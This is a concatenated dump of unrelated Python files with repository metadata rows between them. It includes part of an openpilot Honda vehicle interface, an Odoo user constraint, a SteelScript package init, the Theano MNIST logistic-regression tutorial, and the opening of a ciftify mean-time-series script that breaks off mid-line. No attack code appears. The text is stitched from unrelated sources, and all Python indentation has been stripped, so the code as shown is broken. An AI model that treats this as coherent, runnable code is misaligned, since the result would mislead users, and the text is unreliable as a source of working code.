elif candidate in (CAR.CRV, CAR.CRV_EU):
stop_and_go = False
ret.mass = 3572. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.62
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.89 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.CRV_5G:
stop_and_go = True
ret.mass = 3410. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.66
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.0 # 12.3 is spec end-to-end
if eps_modified:
# stock request input values: 0x0000, 0x00DB, 0x01BB, 0x0296, 0x0377, 0x0454, 0x0532, 0x0610, 0x067F
# stock request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x129A, 0x134D, 0x1400
# modified request output values: 0x0000, 0x0500, 0x0A15, 0x0E6D, 0x1100, 0x1200, 0x1ACD, 0x239A, 0x2800
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 2560, 10000], [0, 2560, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.21], [0.07]]
else:
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.64], [0.192]]
tire_stiffness_factor = 0.677
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.CRV_HYBRID:
stop_and_go = True
ret.mass = 1667. + STD_CARGO_KG # mean of 4 models in kg
ret.wheelbase = 2.66
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 16.0 # 12.3 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.677
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.FIT:
stop_and_go = False
ret.mass = 2644. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.53
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 13.06
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.75
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
elif candidate == CAR.FREED:
stop_and_go = False
ret.mass = 3086. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.74
# the remaining parameters were copied from FIT
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 13.06
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]]
tire_stiffness_factor = 0.75
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.2], [0.05]]
elif candidate == CAR.HRV:
stop_and_go = False
ret.mass = 3125 * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.61
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 15.2
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]]
tire_stiffness_factor = 0.5
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.16], [0.025]]
ret.wheelSpeedFactor = 1.025
elif candidate == CAR.ACURA_RDX:
stop_and_go = False
ret.mass = 3935. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.68
ret.centerToFront = ret.wheelbase * 0.38
ret.steerRatio = 15.0 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 1000], [0, 1000]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.8], [0.24]]
elif candidate == CAR.ACURA_RDX_3G:
stop_and_go = True
ret.mass = 4068. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.75
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 11.95 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 3840], [0, 3840]]
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
tire_stiffness_factor = 0.677
elif candidate == CAR.ODYSSEY:
stop_and_go = False
ret.mass = 4471. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 3.00
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 14.35 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]]
elif candidate == CAR.ODYSSEY_CHN:
stop_and_go = False
ret.mass = 1849.2 + STD_CARGO_KG # mean of 4 models in kg
ret.wheelbase = 2.90
ret.centerToFront = ret.wheelbase * 0.41 # from CAR.ODYSSEY
ret.steerRatio = 14.35
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 32767], [0, 32767]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.28], [0.08]]
elif candidate in (CAR.PILOT, CAR.PILOT_2019):
stop_and_go = False
ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight
ret.wheelbase = 2.82
ret.centerToFront = ret.wheelbase * 0.428
ret.steerRatio = 17.25 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.PASSPORT:
stop_and_go = False
ret.mass = 4204. * CV.LB_TO_KG + STD_CARGO_KG # average weight
ret.wheelbase = 2.82
ret.centerToFront = ret.wheelbase * 0.428
ret.steerRatio = 17.25 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.RIDGELINE:
stop_and_go = False
ret.mass = 4515. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 3.18
ret.centerToFront = ret.wheelbase * 0.41
ret.steerRatio = 15.59 # as spec
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.444
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.38], [0.11]]
elif candidate == CAR.INSIGHT:
stop_and_go = True
ret.mass = 2987. * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.7
ret.centerToFront = ret.wheelbase * 0.39
ret.steerRatio = 15.0 # 12.58 is spec end-to-end
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]]
elif candidate == CAR.HONDA_E:
stop_and_go = True
ret.mass = 3338.8 * CV.LB_TO_KG + STD_CARGO_KG
ret.wheelbase = 2.5
ret.centerToFront = ret.wheelbase * 0.5
ret.steerRatio = 16.71
ret.lateralParams.torqueBP, ret.lateralParams.torqueV = [[0, 4096], [0, 4096]] # TODO: determine if there is a dead zone at the top end
tire_stiffness_factor = 0.82
ret.lateralTuning.pid.kpV, ret.lateralTuning.pid.kiV = [[0.6], [0.18]] # TODO: can probably use some tuning
else:
raise ValueError("unsupported car %s" % candidate)
# These cars use alternate user brake msg (0x1BE)
if candidate in HONDA_BOSCH_ALT_BRAKE_SIGNAL:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_ALT_BRAKE
# These cars use alternate SCM messages (SCM_FEEDBACK AND SCM_BUTTON)
if candidate in HONDA_NIDEC_ALT_SCM_MESSAGES:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_NIDEC_ALT
if ret.openpilotLongitudinalControl and candidate in HONDA_BOSCH:
ret.safetyConfigs[0].safetyParam |= Panda.FLAG_HONDA_BOSCH_LONG
# min speed to enable ACC. if car can do stop and go, then set enabling speed
# to a negative value, so it won't matter. Otherwise, add 0.5 mph margin to not
# conflict with PCM acc
ret.minEnableSpeed = -1. if (stop_and_go or ret.enableGasInterceptor) else 25.5 * CV.MPH_TO_MS
# TODO: get actual value, for now starting with reasonable value for
# civic and scaling by mass and wheelbase
ret.rotationalInertia = scale_rot_inertia(ret.mass, ret.wheelbase)
# TODO: start from empirically derived lateral slip stiffness for the civic and scale by
# mass and CG position, so all cars will have approximately similar dyn behaviors
ret.tireStiffnessFront, ret.tireStiffnessRear = scale_tire_stiffness(ret.mass, ret.wheelbase, ret.centerToFront,
tire_stiffness_factor=tire_stiffness_factor)
ret.steerActuatorDelay = 0.1
ret.steerRateCost = 0.5
ret.steerLimitTimer = 0.8
return ret
@staticmethod
def init(CP, logcan, sendcan):
if CP.carFingerprint in HONDA_BOSCH and CP.openpilotLongitudinalControl:
disable_ecu(logcan, sendcan, bus=1, addr=0x18DAB0F1, com_cont_req=b'\x28\x83\x03')
# returns a car.CarState
def update(self, c, can_strings):
# ******************* do can recv *******************
self.cp.update_strings(can_strings)
self.cp_cam.update_strings(can_strings)
if self.cp_body:
self.cp_body.update_strings(can_strings)
ret = self.CS.update(self.cp, self.cp_cam, self.cp_body)
ret.canValid = self.cp.can_valid and self.cp_cam.can_valid and (self.cp_body is None or self.cp_body.can_valid)
ret.yawRate = self.VM.yaw_rate(ret.steeringAngleDeg * CV.DEG_TO_RAD, ret.vEgo)
buttonEvents = []
if self.CS.cruise_buttons != self.CS.prev_cruise_buttons:
be = car.CarState.ButtonEvent.new_message()
be.type = ButtonType.unknown
if self.CS.cruise_buttons != 0:
be.pressed = True
but = self.CS.cruise_buttons
else:
be.pressed = False
but = self.CS.prev_cruise_buttons
if but == CruiseButtons.RES_ACCEL:
be.type = ButtonType.accelCruise
elif but == CruiseButtons.DECEL_SET:
be.type = ButtonType.decelCruise
elif but == CruiseButtons.CANCEL:
be.type = ButtonType.cancel
elif but == CruiseButtons.MAIN:
be.type = ButtonType.altButton3
buttonEvents.append(be)
if self.CS.cruise_setting != self.CS.prev_cruise_setting:
be = car.CarState.ButtonEvent.new_message()
be.type = ButtonType.unknown
if self.CS.cruise_setting != 0:
be.pressed = True
but = self.CS.cruise_setting
else:
be.pressed = False
but = self.CS.prev_cruise_setting
if but == 1:
be.type = ButtonType.altButton1
# TODO: more buttons?
buttonEvents.append(be)
ret.buttonEvents = buttonEvents
# events
events = self.create_common_events(ret, pcm_enable=False)
if self.CS.brake_error:
events.add(EventName.brakeUnavailable)
if self.CS.park_brake:
events.add(EventName.parkBrake)
if self.CP.pcmCruise and ret.vEgo < self.CP.minEnableSpeed:
events.add(EventName.belowEngageSpeed)
if self.CP.pcmCruise:
# we engage when pcm is active (rising edge)
if ret.cruiseState.enabled and not self.CS.out.cruiseState.enabled:
events.add(EventName.pcmEnable)
elif not ret.cruiseState.enabled and (c.actuators.accel >= 0. or not self.CP.openpilotLongitudinalControl):
# it can happen that car cruise disables while comma system is enabled: need to
# keep braking if needed or if the speed is very low
if ret.vEgo < self.CP.minEnableSpeed + 2.:
# non loud alert if cruise disables below 25mph as expected (+ a little margin)
events.add(EventName.speedTooLow)
else:
events.add(EventName.cruiseDisabled)
if self.CS.CP.minEnableSpeed > 0 and ret.vEgo < 0.001:
events.add(EventName.manualRestart)
# handle button presses
for b in ret.buttonEvents:
# do enable on both accel and decel buttons
if b.type in [ButtonType.accelCruise, ButtonType.decelCruise] and not b.pressed:
if not self.CP.pcmCruise:
events.add(EventName.buttonEnable)
# do disable on button down
if b.type == ButtonType.cancel and b.pressed:
events.add(EventName.buttonCancel)
ret.events = events.to_msg()
self.CS.out = ret.as_reader()
return self.CS.out
# pass in a car.CarControl
# to be called @ 100hz
def apply(self, c):
if c.hudControl.speedVisible:
hud_v_cruise = c.hudControl.setSpeed * CV.MS_TO_KPH
else:
hud_v_cruise = 255
can_sends = self.CC.update(c.enabled, c.active, self.CS, self.frame,
c.actuators,
c.cruiseControl.cancel,
hud_v_cruise,
c.hudControl.lanesVisible,
hud_show_car=c.hudControl.leadVisible,
hud_alert=c.hudControl.visualAlert)
self.frame += 1
return can_sends
| 45.465632 | 163 | 0.674762 |
4a7b23dde1a5c9845c0a9350805145cd32c7dbf0 | 396 | py | Python | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | 3 | 2016-04-08T03:27:08.000Z | 2019-08-14T07:01:54.000Z | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | null | null | null | steelscript/steelhead/core/__init__.py | riverbed/steelscript-steelhead | 7158578f7ad97eaff9968b2aca82da2d322284ba | [
"MIT"
] | 3 | 2018-05-22T14:52:47.000Z | 2020-09-23T01:07:00.000Z | # Copyright (c) 2019 Riverbed Technology, Inc.
#
# This software is licensed under the terms and conditions of the MIT License
# accompanying the software ("License"). This software is distributed "AS IS"
# as set forth in the License.
"""
The SteelHead package offers a set of interfaces to control and work with
a SteelHead appliance.
"""
from steelscript.steelhead.core.steelhead import *
| 28.285714 | 78 | 0.762626 |
cc423c2d3a5e722e189db55f69a7b391acde6dbf | 1,087 | py | Python | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | addons/account/models/res_users.py | jjiege/odoo | fd5b8ad387c1881f349d125cbd56433f4d49398f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, models, _
from odoo.exceptions import ValidationError
class Users(models.Model):
_inherit = "res.users"
@api.multi
@api.constrains('groups_id')
def _check_one_user_type(self):
super(Users, self)._check_one_user_type()
g1 = self.env.ref('account.group_show_line_subtotals_tax_included', False)
g2 = self.env.ref('account.group_show_line_subtotals_tax_excluded', False)
if not g1 or not g2:
# A user cannot be in a non-existant group
return
if self._has_multiple_groups([g1.id, g2.id]):
raise ValidationError(_("A user cannot have both Tax B2B and Tax B2C.\n"
"You should go in General Settings, and choose to display Product Prices\n"
"either in 'Tax-Included' or in 'Tax-Excluded' mode\n"
"(or switch twice the mode if you are already in the desired one)."))
| 38.821429 | 111 | 0.620975 |
599f56583bc4faa499d44931c73abfb965a9026e | 16,081 | py | Python | code/model/mlp/logistic_sgd.py | fegonda/icon_demo | d2d1b0148989187c1433597f9c3ae4357178c082 | [
"MIT"
] | 92 | 2016-03-05T23:33:13.000Z | 2022-01-12T11:44:16.000Z | logistic_sgd.py | deepanjanroy/aml3 | e70999c77a8d4d9c40cdceb1168922e5cd5ea40d | [
"MIT"
] | 4 | 2016-06-03T14:07:19.000Z | 2018-11-18T14:04:57.000Z | logistic_sgd.py | deepanjanroy/aml3 | e70999c77a8d4d9c40cdceb1168922e5cd5ea40d | [
"MIT"
] | 46 | 2016-05-25T13:59:30.000Z | 2022-02-08T12:10:33.000Z | """
This tutorial introduces logistic regression using Theano and stochastic
gradient descent.
Logistic regression is a probabilistic, linear classifier. It is parametrized
by a weight matrix :math:`W` and a bias vector :math:`b`. Classification is
done by projecting data points onto a set of hyperplanes, the distance to
which is used to determine a class membership probability.
Mathematically, this can be written as:
.. math::
P(Y=i|x, W,b) &= softmax_i(W x + b) \\
&= \frac {e^{W_i x + b_i}} {\sum_j e^{W_j x + b_j}}
The output of the model or prediction is then done by taking the argmax of
the vector whose i'th element is P(Y=i|x).
.. math::
y_{pred} = argmax_i P(Y=i|x,W,b)
This tutorial presents a stochastic gradient descent optimization method
suitable for large datasets.
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 4.3.2
"""
__docformat__ = 'restructedtext en'
import cPickle
import gzip
import os
import sys
import time
import numpy
import theano
import theano.tensor as T
class LogisticRegression(object):
"""Multi-class Logistic Regression Class
The logistic regression is fully described by a weight matrix :math:`W`
and bias vector :math:`b`. Classification is done by projecting data
points onto a set of hyperplanes, the distance to which is used to
determine a class membership probability.
"""
def __init__(self, input, n_in, n_out):
""" Initialize the parameters of the logistic regression
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# start-snippet-1
# initialize with 0 the weights W as a matrix of shape (n_in, n_out)
self.W = theano.shared(
value=numpy.zeros(
(n_in, n_out),
dtype=theano.config.floatX
),
name='W',
borrow=True
)
# initialize the baises b as a vector of n_out 0s
self.b = theano.shared(
value=numpy.zeros(
(n_out,),
dtype=theano.config.floatX
),
name='b',
borrow=True
)
# symbolic expression for computing the matrix of class-membership
# probabilities
# Where:
# W is a matrix where column-k represent the separation hyper plain for
# class-k
# x is a matrix where row-j represents input training sample-j
# b is a vector where element-k represent the free parameter of hyper
# plain-k
self.p_y_given_x = T.nnet.softmax(T.dot(input, self.W) + self.b)
# symbolic description of how to compute prediction as class whose
# probability is maximal
self.y_pred = T.argmax(self.p_y_given_x, axis=1)
# end-snippet-1
# parameters of the model
self.params = [self.W, self.b]
def negative_log_likelihood(self, y):
"""Return the mean of the negative log-likelihood of the prediction
of this model under a given target distribution.
.. math::
\frac{1}{|\mathcal{D}|} \mathcal{L} (\theta=\{W,b\}, \mathcal{D}) =
\frac{1}{|\mathcal{D}|} \sum_{i=0}^{|\mathcal{D}|}
\log(P(Y=y^{(i)}|x^{(i)}, W,b)) \\
\ell (\theta=\{W,b\}, \mathcal{D})
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
Note: we use the mean instead of the sum so that
the learning rate is less dependent on the batch size
"""
# start-snippet-2
# y.shape[0] is (symbolically) the number of rows in y, i.e.,
# number of examples (call it n) in the minibatch
# T.arange(y.shape[0]) is a symbolic vector which will contain
# [0,1,2,... n-1] T.log(self.p_y_given_x) is a matrix of
# Log-Probabilities (call it LP) with one row per example and
# one column per class LP[T.arange(y.shape[0]),y] is a vector
# v containing [LP[0,y[0]], LP[1,y[1]], LP[2,y[2]], ...,
# LP[n-1,y[n-1]]] and T.mean(LP[T.arange(y.shape[0]),y]) is
# the mean (across minibatch examples) of the elements in v,
# i.e., the mean log-likelihood across the minibatch.
return -T.mean(T.log(self.p_y_given_x)[T.arange(y.shape[0]), y])
# end-snippet-2
def errors(self, y):
"""Return a float representing the number of errors in the minibatch
over the total number of examples of the minibatch ; zero one
loss over the size of the minibatch
:type y: theano.tensor.TensorType
:param y: corresponds to a vector that gives for each example the
correct label
"""
# check if y has same dimension of y_pred
if y.ndim != self.y_pred.ndim:
raise TypeError(
'y should have the same shape as self.y_pred',
('y', y.type, 'y_pred', self.y_pred.type)
)
# check if y is of the correct datatype
if y.dtype.startswith('int'):
# the T.neq operator returns a vector of 0s and 1s, where 1
# represents a mistake in prediction
return T.mean(T.neq(self.y_pred, y))
else:
raise NotImplementedError()
def load_data(dataset):
''' Loads the dataset
:type dataset: string
:param dataset: the path to the dataset (here MNIST)
'''
#############
# LOAD DATA #
#############
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print 'Downloading data from %s' % origin
urllib.urlretrieve(origin, dataset)
print '... loading data'
# Load the dataset
f = gzip.open(dataset, 'rb')
train_set, valid_set, test_set = cPickle.load(f)
f.close()
#train_set, valid_set, test_set format: tuple(input, target)
#input is an numpy.ndarray of 2 dimensions (a matrix)
#witch row's correspond to an example. target is a
#numpy.ndarray of 1 dimensions (vector)) that have the same length as
#the number of rows in the input. It should give the target
#target to the example with the same index in the input.
def shared_dataset(data_xy, borrow=True):
""" Function that loads the dataset into shared variables
The reason we store our dataset in shared variables is to allow
Theano to copy it into the GPU memory (when code is run on GPU).
Since copying data into the GPU is slow, copying a minibatch everytime
is needed (the default behaviour if the data is not in a shared
variable) would lead to a large decrease in performance.
"""
data_x, data_y = data_xy
shared_x = theano.shared(numpy.asarray(data_x,
dtype=theano.config.floatX),
borrow=borrow)
shared_y = theano.shared(numpy.asarray(data_y,
dtype=theano.config.floatX),
borrow=borrow)
# When storing data on the GPU it has to be stored as floats
# therefore we will store the labels as ``floatX`` as well
# (``shared_y`` does exactly that). But during our computations
# we need them as ints (we use labels as index, and if they are
# floats it doesn't make sense) therefore instead of returning
# ``shared_y`` we will have to cast it to int. This little hack
# lets ous get around this issue
return shared_x, T.cast(shared_y, 'int32')
test_set_x, test_set_y = shared_dataset(test_set)
valid_set_x, valid_set_y = shared_dataset(valid_set)
train_set_x, train_set_y = shared_dataset(train_set)
rval = [(train_set_x, train_set_y), (valid_set_x, valid_set_y),
(test_set_x, test_set_y)]
return rval
def sgd_optimization_mnist(learning_rate=0.13, n_epochs=1000,
dataset='mnist.pkl.gz',
batch_size=600):
"""
Demonstrate stochastic gradient descent optimization of a log-linear
model
This is demonstrated on MNIST.
:type learning_rate: float
:param learning_rate: learning rate used (factor for the stochastic
gradient)
:type n_epochs: int
:param n_epochs: maximal number of epochs to run the optimizer
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
# generate symbolic variables for input (x and y represent a
# minibatch)
x = T.matrix('x') # data, presented as rasterized images
y = T.ivector('y') # labels, presented as 1D vector of [int] labels
# construct the logistic regression class
# Each MNIST image has size 28*28
classifier = LogisticRegression(input=x, n_in=28 * 28, n_out=10)
# the cost we minimize during training is the negative log likelihood of
# the model in symbolic format
cost = classifier.negative_log_likelihood(y)
# compiling a Theano function that computes the mistakes that are made by
# the model on a minibatch
test_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size: (index + 1) * batch_size],
y: test_set_y[index * batch_size: (index + 1) * batch_size]
}
)
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size: (index + 1) * batch_size],
y: valid_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# compute the gradient of cost with respect to theta = (W,b)
g_W = T.grad(cost=cost, wrt=classifier.W)
g_b = T.grad(cost=cost, wrt=classifier.b)
# start-snippet-3
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs.
updates = [(classifier.W, classifier.W - learning_rate * g_W),
(classifier.b, classifier.b - learning_rate * g_b)]
# compiling a Theano function `train_model` that returns the cost, but in
# the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# end-snippet-3
###############
# TRAIN MODEL #
###############
print '... training the model'
# early-stopping parameters
patience = 5000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
test_score = 0.
start_time = time.clock()
done_looping = False
epoch = 0
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i)
for i in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print(
'epoch %i, minibatch %i/%i, validation error %f %%' %
(
epoch,
minibatch_index + 1,
n_train_batches,
this_validation_loss * 100.
)
)
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if this_validation_loss < best_validation_loss * \
improvement_threshold:
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
# test it on the test set
test_losses = [test_model(i)
for i in xrange(n_test_batches)]
test_score = numpy.mean(test_losses)
print(
(
' epoch %i, minibatch %i/%i, test error of'
' best model %f %%'
) %
(
epoch,
minibatch_index + 1,
n_train_batches,
test_score * 100.
)
)
if patience <= iter:
done_looping = True
break
end_time = time.clock()
print(
(
'Optimization complete with best validation score of %f %%,'
'with test performance %f %%'
)
% (best_validation_loss * 100., test_score * 100.)
)
print 'The code run for %d epochs, with %f epochs/sec' % (
epoch, 1. * epoch / (end_time - start_time))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.1fs' % ((end_time - start_time)))
if __name__ == '__main__':
sgd_optimization_mnist()
| 36.714612 | 79 | 0.582551 |
5d4842c1e6e59a91e18bae3634209faf45079985 | 6,225 | py | Python | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | ciftify/bin/ciftify_meants.py | lgrennan/ciftify | 8488423bd081370614b676a2e1d1a8dbfd9aba1c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
Produces a csv file mean voxel/vertex time series from a functional file <func>
within a seed mask <seed>.
Usage:
ciftify_meants [options] <func> <seed>
Arguments:
<func> functional data can be (nifti or cifti)
<seed> seed mask (nifti, cifti or gifti)
Options:
--outputcsv PATH Specify the output filename
--outputlabels PATH Specity a file to print the ROI row ids to.
--mask FILE brainmask (file format should match seed)
--roi-label INT Specify the numeric label of the ROI you want a seedmap for
--weighted Compute weighted average timeseries from the seed map
--hemi HEMI If the seed is a gifti file, specify the hemisphere (R or L) here
-v,--verbose Verbose logging
--debug Debug logging
-h, --help Prints this message
DETAILS:
The default output filename is <func>_<seed>_meants.csv inside the same directory
as the <func> file. This can be changed by specifying the full path after
the '--outputcsv' option. The integer labels for the seeds extracted can be printed
to text using the '--outputlabels' option.
If the seed file contains multiple interger values (i.e. an altas). One row will
be written for each integer value. If you only want a timeseries from one roi in
an atlas, you can specify the integer with the --roi-label option.
A weighted avereage can be calculated from a continuous seed if the --weighted
flag is given.
If a mask is given, the intersection of this mask and the seed mask will be taken.
If a nifti seed if given for a cifti functional file, wb_command -cifti separate will
try extract the subcortical cifti data and try to work with that.
Written by Erin W Dickie, March 17, 2016
"""
import sys
import subprocess
import os
import tempfile
import shutil
import logging
import logging.config
import numpy as np
import scipy as sp
import nibabel as nib
from docopt import docopt
import ciftify
from ciftify.meants import MeantsSettings
logger = logging.getLogger('ciftify')
logger.setLevel(logging.DEBUG)
def run_ciftify_meants(settings):
'''run ciftify_meants workflow '''
## if seed is dlabel - convert to dscalar
if ".dlabel.nii" in settings.seed.path:
## apolagise for all the cases where this approach doesn't work..
if settings.weighted:
logger.error('--weighted mean time-series cannot be calcualted with a .dlabel.nii seed. Exiting.')
sys.exit(1)
if settings.roi_label:
logger.error("Sorry, --roi-label option doesn't work for .dlabel.nii seed inputs. Exiting.")
sys.exit(1)
if settings.mask:
logger.error("Sorry, --mask option doesn't work for .dlabel.nii seed inputs. Exiting.")
sys.exit(1)
if not settings.func.type == 'cifti':
logger.error("If <seed> is .dlabel.nii, the <func> needs to be a cifti file. Exiting.")
sys.exit(1)
## parcellate and then right out the parcellations..
cifti_parcellate_to_meants(settings)
else:
## calculated the meants using numpy
_ = ciftify.meants.calc_meants_with_numpy(settings, outputlabels = settings.outputlabels)
def cifti_parcellate_to_meants(settings):
''' use wb_command -cifti-parcellate to create meants..much faster '''
with ciftify.utils.TempDir() as tempdir:
## parcellate and then right out the parcellations..
if settings.func.path.endswith('dtseries.nii'):
tmp_parcelated = os.path.join(tempdir, 'parcellated.ptseries.nii')
if settings.func.path.endswith('dscalar.nii'):
tmp_parcelated = os.path.join(tempdir, 'parcellated.pscalar.nii')
ciftify.utils.run(['wb_command', '-cifti-parcellate',
settings.func.path, settings.seed.path,
'COLUMN', tmp_parcelated])
ciftify.utils.run(['wb_command', '-cifti-convert', '-to-text',
